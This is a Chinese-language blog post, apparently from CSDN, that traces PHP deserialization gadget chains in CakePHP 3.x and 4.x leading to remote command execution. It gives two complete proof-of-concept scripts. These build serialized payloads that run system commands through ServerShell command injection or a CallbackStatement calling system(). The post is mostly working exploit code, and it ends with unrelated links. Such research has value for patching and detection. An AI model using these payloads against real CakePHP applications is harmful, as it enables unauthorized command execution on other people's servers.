• CakePHP 3.x/4.x反序列化RCE链

    最近网上公开了cakephp一些反序列化链的细节,但是没有公开poc,并且网上关于cakephp的反序列化链比较少,于是自己跟一下 ,构造pop链。

    CakePHP简介

    CakePHP是一个运用了诸如ActiveRecord、Association Data Mapping、Front Controller和MVC等著名设计模式的快速开发框架。该项目主要目标是提供一个可以让各种层次的PHP开发人员快速地开发出健壮的Web应用,而又不失灵活性。

    3.x ≤ 3.9.6

    入口位于vendor\symfony\process\Process.php的__destruct方法

    在一些老版本中,__destruct方法是这样的:

    跟进stop方法:

    跟进isRunning方法:

    $this->status可控,可以继续进入updateStatus方法,让其等于"started"即可

    继续跟进readPipes方法:

    发现$this->processPipes可控且调用readAndWrite方法,这样就我们可以调用任意类的__call方法

    全局搜索,找到vendor\cakephp\cakephp\src\ORM\Table.php有合适的__call方法:

    这里的$this->_behaviors也可控,到这里我们就可以调用任意类的call方法了

    继续寻找,在vendor\cakephp\cakephp\src\ORM\BehaviorRegistry.php找到了合适的call方法:

    这里就可以调用任意类的任意方法了,但是参数不可控

    再来看看进入call_user_func_array的条件:

    这里的$method就是之前触发__callreadAndWrite方法

    跟进hasMethod方法,$this->_methodMap可控,所以可以使其返回true

    再来看看has方法,是在父类ObjectRegistry中定义的,$this->_loaded也可控

    所以条件成立,可以利用回调函数调用任意方法

    接下来找到不需要参数的合适方法:

    位于vendor\cakephp\cakephp\src\Shell\ServerShell.php的main方法

    执行的命令由可控参数$this->_host、$this->_port等拼接而成,我们可以利用分号进行命令注入

    但是由于前面的php -S命令,在windows下没有php环境变量可能无法利用

    在执行命令之前,还得先让两个$this->out方法正常返回,否则会报错退出

    一路跟进来到vendor\cakephp\cakephp\src\Console\ConsoleIo.php

    这里的$level为1,我们只需要让$this->_level小于1即可使其返回true

    到这里就可以执行系统命令了

    poc:

    2. namespace Cake\Core;
    3. abstract class ObjectRegistry
    4. {
    5.     public $_loaded = [];
    6. }
    7.  
    8.  
    9. namespace Cake\ORM;
    10. class Table
    11. {
    12.     public $_behaviors;
    13. }
    14.  
    15. use Cake\Core\ObjectRegistry;
    16. class BehaviorRegistry extends ObjectRegistry
    17. {
    18.     public $_methodMap = [];
    19.     protected function _resolveClassName($class){}
    20.     protected function _throwMissingClassError($class, $plugin){}
    21.     protected function _create($class, $alias, $config){}
    22. }
    23.  
    24.  
    25. namespace Cake\Console;
    26. class Shell
    27. {
    28.     public $_io;
    29. }
    30.  
    31. class ConsoleIo
    32. {
    33.     public $_level;
    34. }
    35.  
    36. namespace Cake\Shell;
    37. use Cake\Console\Shell;
    38. class ServerShell extends Shell
    39. {
    40.     public $_host;
    41.     protected $_port = 0;
    42.     protected $_documentRoot = "";
    43.     protected $_iniPath = "";
    44. }
    45.  
    46.  
    47. namespace Symfony\Component\Process;
    48. use Cake\ORM\Table;
    49. class Process
    50. {
    51.     public $processPipes;
    52. }
    53.  
    54.  
    55. $pop = new Process([]);
    56. $pop->status = "started";
    57. $pop->processPipes = new Table();
    58. $pop->processPipes->_behaviors = new \Cake\ORM\BehaviorRegistry();
    59. $pop->processPipes->_behaviors->_methodMap = ["readandwrite"=>["servershell","main"]];
    60. $a = new \Cake\Shell\ServerShell();
    61. $a->_io = new \Cake\Console\ConsoleIo();
    62. $a->_io->_level = 0;
    63. $a->_host = ";open /System/Applications/Calculator.app;";
    64. $pop->processPipes->_behaviors->_loaded = ["servershell"=>$a];
    65.  
    66. echo base64_encode(serialize($pop));

    3.x某些版本、4.x ≤ 4.2.3

    4.x版本前半部分的整体思路和3.x基本一样,部分代码有变动

    4.x版本ServerShell类修改了,没有之前一样好用的方法了

    寻找新的调用链:

    vendor\cakephp\cakephp\src\Database\Statement\CallbackStatement.php

    这里有动态调用,方法名可控,参数$row通过$this->_statement->fetch($type)获得

    于是寻找可用的fetch方法

    vendor\cakephp\cakephp\src\Database\Statement\BufferedStatement.php有合适的方法:

    这里$this->buffer、$this->index、$this->_allFetched参数均可控,可以返回我们指定的$row

    于是可以达成任意方法执行,直接指定system执行系统命令

    poc:

    2. namespace Cake\Core;
    3. abstract class ObjectRegistry
    4. {
    5.     public $_loaded = [];
    6. }
    7.  
    8.  
    9. namespace Cake\ORM;
    10. class Table
    11. {
    12.     public $_behaviors;
    13. }
    14.  
    15. use Cake\Core\ObjectRegistry;
    16. class BehaviorRegistry extends ObjectRegistry
    17. {
    18.     public $_methodMap = [];
    19.     protected function _resolveClassName(string $class): ?string{
    20.         return $class;
    21.     }
    22.     protected function _throwMissingClassError(string $class, ?string $plugin): void{}
    23.     protected function _create($class, $alias, $config){}
    24. }
    25.  
    26.  
    27. namespace Cake\Database\Statement;
    28. class StatementDecorator {
    29.     public $_statement;
    30. }
    31.  
    32. class CallbackStatement extends StatementDecorator
    33. {
    34.     public $_callback;
    35. }
    36.  
    37. class BufferedStatement
    38. {
    39.     public $_allFetched;
    40.     public $buffer = [];
    41.     protected $index = 0;
    42. }
    43.  
    44.  
    45. namespace Symfony\Component\Process;
    46. use Cake\ORM\Table;
    47. class Process
    48. {
    49.     public $processPipes;
    50. }
    51.  
    52.  
    53. $pop = new Process([]);
    54. $pop->status = "started";
    55. $pop->processPipes = new Table();
    56. $pop->processPipes->_behaviors = new \Cake\ORM\BehaviorRegistry();
    57. $pop->processPipes->_behaviors->_methodMap = ["readandwrite"=>["callbackstatement","fetch"]];
    58. $a = new \Cake\Database\Statement\CallbackStatement($statement, $driver,"");
    59. $a->_callback = "system";
    60. $a->_statement = new \Cake\Database\Statement\BufferedStatement($statement, $driver);
    61. $a->_statement->_allFetched = true;
    62. $a->_statement->buffer = ["open /System/Applications/Calculator.app"];
    63. $pop->processPipes->_behaviors->_loaded = ["callbackstatement"=>$a];
    64.  
    65. echo base64_encode(serialize($pop));

  • 相关阅读:
    创建数据库
    [线性dp]Burenka and Traditions Codeforces1719D1&&D2
    845. 数组中的最长山脉
    docker常用软件安装
    数据结构刷题——图论
    实验27:红外遥控三级控速风扇实验
    数据库概论 - MySQL的简单介绍
    linux 服务管理工具 systemctl和 SElinux
    手机和电脑通过TCP传输(一)
    05-jenkins与SonarQube代码审查集成
  • 原文地址:https://blog.csdn.net/why811/article/details/133812903